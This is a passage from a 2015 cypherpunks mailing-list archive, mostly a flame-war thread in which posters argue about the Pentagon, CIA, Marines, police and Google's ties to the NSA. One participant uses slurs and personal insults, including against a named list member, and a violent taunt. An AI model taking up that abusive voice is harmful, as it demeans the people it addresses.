sentries, and so far spread out, and the sentries paid so little, when the marauding Mongols wanted in, to do some marauding, they just bribed a sentry or two. Apparently same with the Europeans in more recent times. So, incentivized people were, secure, wall was not. The biggest security theater. I think the great wall may have been useful psychologically though... to encourage a mindset of unity in the people within. > For a long time, as a contractor at the peak of their heyday, I had access > to AOL's entire user database, complete with name, > address, full credit card info, phone numbers, etc. I could have also > snooped on their Buddylists, their person-to-person video > (Instant Images), and a lot more. There was zero chance that I would abuse > any of that. Your ethics are admirable. I share your personal intentions. I don't trust companies though, except to plunder markets to the maximum profit possible. Zenaan > sdw > > On 7/20/15 2:07 PM, Juan wrote: >> >> cypherpunk : >> >> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >> >> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >> >> >> Not-cypherpunk-at-all : >> >> >>> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >>> >>> I feel perfectly confident that Google is going to protect their >>> billions in income and valuation by being very careful with >>> avoiding abusing their data or users in any strong sense. From sdw at lig.net Tue Jul 21 00:15:16 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 00:15:16 -0700 Subject: an ominous comment In-Reply-To: <55add913.121c8d0a.89df3.1748@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> Message-ID: <55ADF184.9070004@lig.net> On 7/20/15 10:32 PM, Juan wrote: > On Mon, 20 Jul 2015 21:36:57 -0700 > "Stephen D. Williams" wrote: > >> On 7/20/15 9:07 PM, Juan wrote: >>> Hey. *Now* I get it. >>> >>> This mailing list has a lot of tor-tards who are apologists >>> of the pentagon's propaganda and spying efforts. >> Are you saying that the Pentagon is never good or useful? Nor are >> any of their spying efforts? > Are you saying the pentagon is good and useful? The Pentagon et al are protecting a large portion of the world from being overrun. Nobody else will do it. >> ... >> when they don't determine their goals or rules of >> engagement? Their job is to be a bad ass tool, the proverbial big >> stick. It is someone else's job to decide how to use that tool. >> Marines don't kill people, politicians using Marines kill people. >> Err, something like that. > > Marines and other 'military personnel' murder people when > 'ordered' to. They are the worst scumbags on earth. > > Politicians are morally responsible. The military are morally > and materially responsible. Are police always bad too? > ... > Is everyone from the CIA scumbags by definition? > Yes. Whatever you gotta believe. Most of their job is to understand the world, publishing both a nice public database and the presidential daily brief (today's news). And to consult with the President as need so that hopefully reasonably intelligent decisions are made, but that depends on the intelligence of the current president. >> ... > > ... >>> J. >>> >> What's your alternative to all of these things? If you really are >> into security in any sense, you should be able to explain what >> security exposures moderating or eliminating those entities would >> cause and what you would advocate to replace them. > > Are you talking about the US military? And FBI, CIA, State, Google, etc. > > > >> I'm offended in various ways by a lot of what happened in the past, >> often in organizations like DOJ, FBI, etc. that should have known >> better. > Should they? Looks like you don't know what government is. Wha? > > > >> I would even say that a lot of government employees and >> contractors seem to have got away with a lot of things they shouldn't >> have. But that doesn't mean that any of those organizations are >> fundamentally evil and aren't almost completely staffed by >> intelligent, respectable people. > > LOL. So, how much trolling should I let you get away with? > > Worthless murdering scumbags are 'respectable' people and not > 'fundamentally evil'. Sure. Maybe they are 'accidentally' > evil? DOJ, Treasury, State, HHS, etc. are filled with worthless murdering scumbags? There are certain people, Marines et al, who are trained to be very lethal. Sucks to need that, but being anything less than the strongest & baddest isn't an option for the US. They are concentrated, supposed to be carefully deployed and directed. Create people like that from the subset of people who want to be like that and a few are going to go off the rails occasionally. That's a bummer, and needs to be constantly protected against, but there's no obvious alternative. The US is the least imperialist top superpower that ever existed. Still not perfect, but better than all the rest. > How about they 'accidentally' beat you to a pulp and then feed > you to the pigs? Just as an innocent mistake of course... Oh kay. Are you off your meds? >> Anyway, if you're still in the rebelling against authority stage, >> fine, have fun. Good luck with that. In the US, government wise, >> the people are the authority > Really? That's an interesting concept. How many lsd doses do > you need in order to reach the parallel universe where that > is reality? Because in this universe, it isn't. You haven't been watching long or closely enough. Things have changed a lot in the US in my lifetime, and it's only speeding up. >> , their own authority in essence, it just >> may take a long time for that to play out in a given area. > Sure. That's how jesus planned it all. Nonsense again. > >> In some >> ways, this is also true for companies, with some nuance. >> >> sdw >> sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7248 bytes Desc: not available URL: From sdw at lig.net Tue Jul 21 00:29:20 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 00:29:20 -0700 Subject: an ominous comment In-Reply-To: <20150721060840.679F7C0001C@frontend1.nyi.internal> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <20150721060840.679F7C0001C@frontend1.nyi.internal> Message-ID: <55ADF4D0.2040402@lig.net> On 7/20/15 11:08 PM, Shelley wrote: > On July 20, 2015 2:17:54 PM Juan wrote: > >> >> cypherpunk : >> >> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >> >> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >> >> >> Not-cypherpunk-at-all : >> >> >> > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >> > >> > I feel perfectly confident that Google is going to protect their >> > billions in income and valuation by being very careful with >> > avoiding abusing their data or users in any strong sense. >> > > > Yes Juan, thank you for posting this link! This isn't even new, we just got proof in that Stratfor email dump. Anyone who can > read that and want to have anything to do with google in any capacity is insane. Read the whole linked conversation, if you > haven't. It's quite disturbing and enlightening. > > This is a good link to send around to the sHillary bots, too. Not that it'll make a difference. It's Giant Douche and Turd > Sandwich all over again, and if voting really changed anything they'd make it illegal. Just for fun, I reread this. Based just on the text of this page, there is little that is really a gotcha of any significance. A bunch of well-placed, powerful people know each other, bla bla. Google Ideas is trying to spread access to the Internet far and wide and, like any US citizen or company should, consults with the State department when doing anything with a non-first-world-country. The CIA might also want Internet access far and wide in those countries, perhaps for fairly great reasons: general education, anti-propaganda, etc. A modern, educated, liberal technologist wants to counteract extremism with education in any way feasible, oh my. The government is paying for services they are using? Is that unusual? Where is there something that is actually illegal, regressive, or otherwise actually a problem? Plenty of innuendo and situations that could potentially be bad, but where's the meat? I like Wikileaks at all overall. Very entertaining, and some people should stay organized while heavily scrutinizing those in power to detect and expose abuse, or even the appearance of abuse. But I'm not confused by this kind of innuendo and imprecise characterizations. Be specific and clear about what exactly was wrong. What was the specific harm? What should people have done instead? > > -S > sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3798 bytes Desc: not available URL: From juan.g71 at gmail.com Mon Jul 20 21:07:55 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 01:07:55 -0300 Subject: an ominous comment In-Reply-To: <55AD8704.8070104@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> Message-ID: <55adc555.0ae88c0a.425f.3132@mx.google.com> Hey. *Now* I get it. This mailing list has a lot of tor-tards who are apologists of the pentagon's propaganda and spying efforts. It has people who say that the NSA does good things (coderman) It has apologists of the US marines. It has high ranking scumbags from the CIA. It has commie 'anarchists' who are offended by (and would love to silence) people who badmouth the marines' apologists. And NOW it also has a google and cloud apologist. Welcome Stephen =) You are yet another reason to distrust the FLOSS movement and its bloatware. J. From sdw at lig.net Tue Jul 21 01:42:52 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 01:42:52 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <55AE060C.9050201@lig.net> On 7/21/15 1:23 AM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. Williams wrote: >> On 7/20/15 9:07 PM, Juan wrote: >>> And NOW it also has a google and cloud apologist. Welcome >>> Stephen =) You are yet another reason to distrust the FLOSS movement and >>> its bloatware. >> FLOSS has bloatware? > Nah - firefox is a lithe little vegetarian pea pod, lucky to use 1% of > one CPU and a bee's proverbial of your RAM, LibreOffice is so small > and feature free it's lucky to even print a document, and the Linux > kernel, well, it's so clean, small and well documented it's just a few > lines longer than HelloWorld.c - so of course it's well audited and > highly secure as a result. Couldn't ask for cleaner security really. > > Nope, no bloatware round these parts. Someone missed the memo... Polymer 1.0 web app, which is the cleanest HTML / Javascript yet, talking via Swagger IO library to a Go single-executable Docker container (break out of that!) with a very simple matching webAPI app structure... That was some work to find, validate, and select; you're welcome. I love how Microsoft is happy that their mini Windows VM is "only" 400MB to start. Web browsers are the new operating system, so I cut Firefox some slack. Most of what you interact with in the browser API is a Javascript web app anyway. I often have up to 700 tabs open... It is the Javascript on those tabs that makes it a pig. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2166 bytes Desc: not available URL: From grarpamp at gmail.com Mon Jul 20 23:01:10 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 21 Jul 2015 02:01:10 -0400 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On Mon, Jul 20, 2015 at 2:35 AM, coderman wrote: > i am currently collecting an image corpus... so i can automate the > report. yeah, that's it. ;) See it's working, these honeypots have drawn you in, directing your activities, got you writing scripts, downloading stuffs, exposing yourself to, ahem. timing attacks and 0days. Face it, ur 0wn3d. https://twitter.com/PeytonKanee97/status/621249703775223809 Aww, they're just checkin out your tweets, honestly... From juan.g71 at gmail.com Mon Jul 20 22:32:09 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 02:32:09 -0300 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <55add913.121c8d0a.89df3.1748@mx.google.com> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" wrote: > On 7/20/15 9:07 PM, Juan wrote: > > > > Hey. *Now* I get it. > > > > This mailing list has a lot of tor-tards who are apologists > > of the pentagon's propaganda and spying efforts. > > Are you saying that the Pentagon is never good or useful? Nor are > any of their spying efforts? Are you saying the pentagon is good and useful? > > > > > It has people who say that the NSA does good things > > (coderman) > > They don't? Do you have to ask? > > > > > It has apologists of the US marines. > > You have never benefited in any way from the US marines? No. But granted, at least I haven't been directly harmed by them. Which is something not everyobdy can say. > The > footprint there is pretty large. You think they are somehow > fundamentally evil I don't just 'think' it. It's reality. > when they don't determine their goals or rules of > engagement? Their job is to be a bad ass tool, the proverbial big > stick. It is someone else's job to decide how to use that tool. > Marines don't kill people, politicians using Marines kill people. > Err, something like that. Marines and other 'military personnel' murder people when 'ordered' to. They are the worst scumbags on earth. Politicians are morally responsible. The military are morally and materially responsible. > > > > > It has high ranking scumbags from the CIA. > > There are high ranking scumbags from the CIA here? Yes. > Interesting. Sort of. > Is everyone from the CIA scumbags by definition? Yes. > > > It has commie 'anarchists' who are offended by (and would > > love to silence) people who badmouth the marines' apologists. > > Eh? Ask a retard called Nick Econopouly if you want details. > > > > > And NOW it also has a google and cloud apologist. Welcome > > Stephen =) You are yet another reason to distrust the FLOSS > > movement and its bloatware. > > FLOSS has bloatware? http://www.theregister.co.uk/2009/09/22/linus_torvalds_linux_bloated_huge/ good enough of an 'authority'? > Are you using the same meaning as the rest of > us? What's your favorite alternative? There isn't any real alternative. And sure, floss is less bloated than other commercial crap, but still. > > Someone explaining bits of the world are not necessarily an apologist > for those bits. Trying to correct or moderate viewpoint extremism > (see what I did there?) Yes, you tried to dismiss something that doesn't line up with typical establishment bullshit as 'extremism' - I, of course, am hardly impressed... > with more balance, or logic, or other > viewpoints isn't necessarily being an apologist either; that's the > kind of accusation that usually comes from someone slinging not fully > supported barbs. I do think Google is better than some other > companies, but that's pretty weak on the apologist scale; I was more > making a statement about a class of companies and how they should > rationally act with respect to security. Sure. Your comments about google & the cloud are not propaganda. I'm selling a bridge. Interested? > > > J. > > > What's your alternative to all of these things? If you really are > into security in any sense, you should be able to explain what > security exposures moderating or eliminating those entities would > cause and what you would advocate to replace them. Are you talking about the US military? > > I'm offended in various ways by a lot of what happened in the past, > often in organizations like DOJ, FBI, etc. that should have known > better. Should they? Looks like you don't know what government is. >I would even say that a lot of government employees and > contractors seem to have got away with a lot of things they shouldn't > have. But that doesn't mean that any of those organizations are > fundamentally evil and aren't almost completely staffed by > intelligent, respectable people. LOL. So, how much trolling should I let you get away with? Worthless murdering scumbags are 'respectable' people and not 'fundamentally evil'. Sure. Maybe they are 'accidentally' evil? How about they 'accidentally' beat you to a pulp and then feed you to the pigs? Just as an innocent mistake of course... > > Anyway, if you're still in the rebelling against authority stage, > fine, have fun. Good luck with that. In the US, government wise, > the people are the authority Really? That's an interesting concept. How many lsd doses do you need in order to reach the parallel universe where that is reality? Because in this universe, it isn't. >, their own authority in essence, it just > may take a long time for that to play out in a given area. Sure. That's how jesus planned it all. > In some > ways, this is also true for companies, with some nuance. > > sdw > From seanl at literati.org Mon Jul 20 21:03:32 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 21 Jul 2015 04:03:32 +0000 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On Sun, Jul 19, 2015 at 11:42 PM coderman wrote: > On 7/19/15, Alfie John wrote: > > ... > > They are mostly astroturfers, pinging every so often. Click report and > > move on. > > i am currently collecting an image corpus... so i can automate the > report. yeah, that's it. ;) > Tumblr is a much better place to build image corpuses. And then you get to pick from whom you get images rather than letting the spambots pick for you. Of the accounts you listed, only https://twitter.com/PazhetnykhMiss https://twitter.com/helensmithusacc https://twitter.com/PeytonKanee97 are still active. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2006 bytes Desc: not available URL: From admin at pilobilus.net Tue Jul 21 02:28:34 2015 From: admin at pilobilus.net (Steve Kinney) Date: Tue, 21 Jul 2015 05:28:34 -0400 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55AE10C2.6050501@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/21/2015 03:15 AM, Stephen D. Williams wrote: > On 7/20/15 10:32 PM, Juan wrote: >> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" >> wrote: [...] >> Are you saying the pentagon is good and useful? > > The Pentagon et al are protecting a large portion of the world > from being overrun. Nobody else will do it. And all along I thought, the sooner the Pentagon et al stood down and let the world be overrun, the better for the human race. Better in every measurable way, except for the net worth and sovereign power of the wealthy and powerful gangs that sponsor and direct those organizations. >> Politicians are morally responsible. The military are >> morally and materially responsible. > > Are police always bad too? Last I heard, police forces were not dispatched to cross borders and kill large numbers of people, to advance the financial agendas of some few thousands of the folks back home. When the police do what the military does, they become criminals even by the definition of the laws enacted by their own masters. Anyone who deliberately and for personal gain participates in mass murder might be considered "bad." I prefer to think of them as ignorant and disinformed, aside from a minority among them who are psychopathic and in need of minders. >> ... Is everyone from the CIA scumbags by definition? Yes. > > Whatever you gotta believe. Most of their job is to understand > the world, publishing both a nice public database and the > presidential daily brief (today's news). And to consult with > the President as need so that hopefully reasonably intelligent > decisions are made, but that depends on the intelligence of the > current president. So... If I understand this correctly, the CIA, a clandestine U.S. military service, is in the business of persuading Presidents, elected to embody the will of the People, to their way of thinking. Come to think of it, their charter implicity says so. I guess we should have dumped them when we had the chance. IIRC a President once said he was going do just that, too bad somebody shot him. Every corporate entity needs intelligence to function. How many need a department to promote, codify and implement torture as a psychological weapon? How many need a department that arms, trains and directs gangs of killers to put inconvenient market competitors out of business, and take over their shops? How many need a department to set up and run major drug smuggling operations, to fund other violent criminal enterprises off the books ? I try not to go around calling people "scumbags" and come to think of it, I succeed. But there's no denying that working for the CIA in any capacity imparts a certain taint, given that it has been a criminal enterprise more or less since its inception and shows no signs of meaningful reform. By "criminal" I mean, per any common sense definition that does not duck the issue by asserting that certain functions of State are by definition "above the law" due to some existential necessity. A MAFIA bookkeeper who always does an honest day's work and never hurts anybody is not a criminal, righ t? >>> What's your alternative to all of these things? If you >>> really are into security in any sense, you should be able >>> to explain what security exposures moderating or >>> eliminating those entities would cause and what you would >>> advocate to replace them. >> Are you talking about the US military? > And FBI, CIA, State, Google, etc. Practical alternatives to endemic, high dollar institutional violence are limited by the inherent nature of the institutions that carry it out: They exist to impose the will of their masters on whole societies. They defeat their masters' specified enemies by any means necessary, which covers a spectrum from propaganda through deception, bribery and terrorism to the industrialized mass murder we call warfare. Try to stop them; if you show signs of success, their masters will direct them to neutralize YOU by any means necessary. As things stand, we don't have enough volunteers to shut down the killing machine by direct intervention. If and when we do, the emergent organizations that make it possible will also play key roles in developing long term solutions for international conflicts. As a practical matter, one must do what one can to stop the bleeding; such efforts tend to be contagious, and we have ways of spreading that contagion. It starts with telling the truth. Opportunities to do that keep coming faster and faster. >>> I'm offended in various ways by a lot of what happened in >>> the past, often in organizations like DOJ, FBI, etc. that >>> should have known better. >> Should they? Looks like you don't know what government is. > Wha? Most people don't know what government is, because those who govern use a very different definition than the ones the governed are taught: State sovereignty is the power to rob, kidnap and kill withing a given territorial boundary, and to defend these powers as one's exclusive prerogative. Anarchists are consistently depicted as violent lunatics opposed to any form of social order. The idea that government is based on the consent of the governed is all well and good in a civics class, but God forbid someone should try to actually implement that fine theory by withdrawing their consent from particular incarnations and/or functions of government. >> Worthless murdering scumbags are 'respectable' people and >> not 'fundamentally evil'. Sure. Maybe they are >> 'accidentally' evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless > murdering scumbags? I would not say so, but broadly speaking, they are directed by political appointees who, to varying extents, run them as criminal enterprises. Criminal, even by the very liberal and tolerant standards set by the State that employs them. > There are certain people, Marines et al, who are trained to be > very lethal. Sucks to need that, but being anything less than > the strongest & baddest isn't an option for the US. They are > concentrated, supposed to be carefully deployed and directed. > Create people like that from the subset of people who want to > be like that and a few are going to go off the rails > occasionally. That's a bummer, and needs to be constantly > protected against, but there's no obvious alternative. To me, the alternatives are painfully obvious. Step one in a real "war against terror" is to stop doing terrorism. Step one in defending a country's "way of life" is to invest in its human and industrial infrastructure. It certainly makes no sense to indulge in multi-trillion dollar tax and debt funded economic bonfires that produce nothing but paychecks, stock dividends and the odd few million dead bodies and refugees here and there. > The US is the least imperialist top superpower that ever > existed. Still not perfect, but better than all the rest. That's kind of like advertising oneself as the kindest, most considerate serial killer presently at large. It doesn't take a lifetime of study or exceptional brain power to recognize gross offenses to the values that define human beings as social animals fit to walk the Earth. It does take a lifetime of study and exceptional brain power, on the part of a whole managerial class, to direct that society to commit such offenses and take them for granted as regrettable necessities. The survival value of human intelligence has not been satisfactorily demonstrated. Its hazards are becoming more obvious every day. :o/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVrhC/AAoJEDZ0Gg87KR0LXAwQAMkGzKbZ3hw1uCVhjguLhbJQ wBXYHHhciXuUweW5FUSMaZPRDnZ9az4TE8pq0l3Kd8NhRx+wv9GQH5BbeyShPrx0 hvuNyaImg2+CxCO6JBRovcqm+oQX812JSl8sD7/mLlpG084aidUook7tESHVNYgG pJbQvCT9H4fjQTXEZksbPYrtIneh5G8csusWeDhGXP3yEtTPK7KSAJ1JSFF/SMkf B1pbHUh4hvO4dJNa+iVIKWUJyQ9LpsLkVCpW/QZllfb3Fy4FVnIaTKzuvg/KrIEs 9ulgBwwIozGvNxAcaIekI6WrtbDGrCL0s47i+ruEy7fEZw4aQkGuqTvcExOHHSjZ DchPIGCL7WpWP+n2D9ML+8CqZ2yvbU7+KKpRJYOTQ1fzKaATa9Fh6xGYeT255RkL qln6IIpJTu9p01kmuQvIKkquMeoSzx0FhugaSXdhwKDZIeALkphLnr1x8hZ6DK+y T4HovlPyGoYMme1TkJXvVdjyG2GWvYnfA25ZvD4IvwzVk61ghEUqM+dzxbMtWgbh 2cjShMRUJEJXPN5HCaQx3lWW9uUBMg7K/uVuk/jz4zs0b4ChboqpYO2Sv3iwpSxt 3+eWscLmq8/TcofsUlggFpXpYPbFT5jqZL74lOQLn6xl//4mDxy8LbcYhsAz+Gwh 5AExaEYU6vTbndh5EwZF =hfWs -----END PGP SIGNATURE----- From juan.g71 at gmail.com Tue Jul 21 01:59:52 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 05:59:52 -0300 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> Message-ID: <55ae09c4.b4528c0a.4721.48fc@mx.google.com> On Tue, 21 Jul 2015 00:15:16 -0700 "Stephen D. Williams" wrote: > On 7/20/15 10:32 PM, Juan wrote: > > On Mon, 20 Jul 2015 21:36:57 -0700 > > "Stephen D. Williams" wrote: > > > >> On 7/20/15 9:07 PM, Juan wrote: > >>> Hey. *Now* I get it. > >>> > >>> This mailing list has a lot of tor-tards who are > >>> apologists of the pentagon's propaganda and spying efforts. > >> Are you saying that the Pentagon is never good or useful? Nor are > >> any of their spying efforts? > > Are you saying the pentagon is good and useful? > > The Pentagon et al are protecting a large portion of the world from > being overrun by aliens from the 5th dimension, right. > Nobody else will do it. correct. > > >> ... > >> when they don't determine their goals or rules of > >> engagement? Their job is to be a bad ass tool, the proverbial big > >> stick. It is someone else's job to decide how to use that tool. > >> Marines don't kill people, politicians using Marines kill people. > >> Err, something like that. > > > > Marines and other 'military personnel' murder people when > > 'ordered' to. They are the worst scumbags on earth. > > > > Politicians are morally responsible. The military are > > morally and materially responsible. > > Are police always bad too? Yep. Same kind of psycho. > > > ... > > Is everyone from the CIA scumbags by definition? > > Yes. > > Whatever you gotta believe. Most of their job is to understand the > world, publishing both a nice public database and the presidential > daily brief (today's news). And to consult with the President as > need so that hopefully reasonably intelligent decisions are made, but > that depends on the intelligence of the current president. are you for real? > > >> ... > > > > ... > >>> J. > >>> > >> What's your alternative to all of these things? If you really are > >> into security in any sense, you should be able to explain what > >> security exposures moderating or eliminating those entities would > >> cause and what you would advocate to replace them. > > > > Are you talking about the US military? > And FBI, CIA, State, Google, etc. I suggest you go to a library and get a few books. > > > > > > > >> I would even say that a lot of government employees and > >> contractors seem to have got away with a lot of things they > >> shouldn't have. But that doesn't mean that any of those > >> organizations are fundamentally evil and aren't almost completely > >> staffed by intelligent, respectable people. > > > > LOL. So, how much trolling should I let you get away with? > > > > Worthless murdering scumbags are 'respectable' people and > > not 'fundamentally evil'. Sure. Maybe they are 'accidentally' > > evil? > > DOJ, Treasury, State, HHS, etc. are filled with worthless murdering > scumbags? Oh, all of them believe in murdering anybody who doesn't recognize their divine authority. You know, the one and only 'argument' behind government : obey or die. > > There are certain people, Marines et al, who are trained to be very > lethal. Sucks to need that, but being anything less than the > strongest & baddest isn't an option for the US. Again, are you for real? > They are > concentrated, supposed to be carefully deployed and directed. Create > people like that from the subset of people who want to be like that > and a few are going to go off the rails occasionally. That's a > bummer, and needs to be constantly protected against, but there's no > obvious alternative. Sure. > > The US is the least imperialist top superpower that ever existed. Sure. > Still not perfect, but better than all the rest. Sure. How does it feel to be a brain-dead americunt? Well, I guess at least it's not painful. You'd need some kind of functioning brain to feel pain. > > > How about they 'accidentally' beat you to a pulp and then > > feed you to the pigs? Just as an innocent mistake of course... > > Oh kay. Are you off your meds? No sonny. You are. What, you wouldn't like to be treated the way your marines treat other people? Tsk tsk. > >> Anyway, if you're still in the rebelling against authority stage, > >> fine, have fun. Good luck with that. In the US, government wise, > >> the people are the authority > > Really? That's an interesting concept. How many lsd doses do > > you need in order to reach the parallel universe where that > > is reality? Because in this universe, it isn't. > > You haven't been watching long or closely enough. Things have > changed a lot in the US in my lifetime, and it's only speeding up. You are either out of your mind, trolling, or both. Or you mean that final coming of the americunt police state is speeding up? > > >> , their own authority in essence, it just > >> may take a long time for that to play out in a given area. > > Sure. That's how jesus planned it all. > > Nonsense again. > Yep, that's the only thing you are throwing up. Actually it's propaganda but it's so fucking stupid that "nonsense" describes it as well. So yeah. Google and the cloud. Maybe you got 'cypherpunk' and 'neocunt' mixed up. > > > >> In some > >> ways, this is also true for companies, with some nuance. > >> > >> sdw > >> > > sdw > From grarpamp at gmail.com Tue Jul 21 03:02:16 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 21 Jul 2015 06:02:16 -0400 Subject: an ominous comment In-Reply-To: <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <6026027D-4A9F-4D2E-A17A-6BD7C6F99B55@openmailbox.org> Message-ID: On Tue, Jul 21, 2015 at 4:32 AM, oshwm wrote: > You lot sound like the types that'd run openbsd on your desktops :D That's not a bug. From list at sysfu.com Tue Jul 21 06:58:52 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 06:58:52 -0700 Subject: an ominous comment In-Reply-To: <55AE10C2.6050501@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> Message-ID: On Tue, 21 Jul 2015 02:28:34 -0700, Steve Kinney wrote: Steve, that was a tour de force. I was about to leap out of my chair and start pounding out a similar reply but you pretty much summed how I feel to the tee. Correct me if I'm wrong, but aren't the roots of the Cypherpunk movement more or less explicitly anarchist? The number of state-theists on this list never ceases to amaze. From list at sysfu.com Tue Jul 21 07:14:27 2015 From: list at sysfu.com (Seth) Date: Tue, 21 Jul 2015 07:14:27 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <1967648.u6W7a8k46C@lapuntu> References: <179659091.PKgjI4HLZx@lapuntu> <1967648.u6W7a8k46C@lapuntu> Message-ID: On Sat, 18 Jul 2015 14:09:21 -0700, rysiek wrote: > Run your own servers, control your own infrastructure. There are ways to > do > it. Next on my "ToTest" list is this, for instance: > https://github.com/sovereign/sovereign Funny you mention the Sovereign project, I stumbled upon it myself for the first time last week. I had already been in the process of building my own version of essentially the same thing, only geared more towards Parabola GNU/Linux and Open/FreeBSD. Another interesting project for wresting back control of your data and services is indiehosters [1][2] Probably a better option for those without copious amounts of free time and the technical skills and desire to implement a DIY solution. [1] http://www.wired.com/2014/11/indie-hosters/ [2] https://indiehosters.net/ From shelley at misanthropia.org Tue Jul 21 07:46:16 2015 From: shelley at misanthropia.org (Shelley) Date: Tue, 21 Jul 2015 07:46:16 -0700 Subject: an ominous comment In-Reply-To: <55AE10C2.6050501@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> 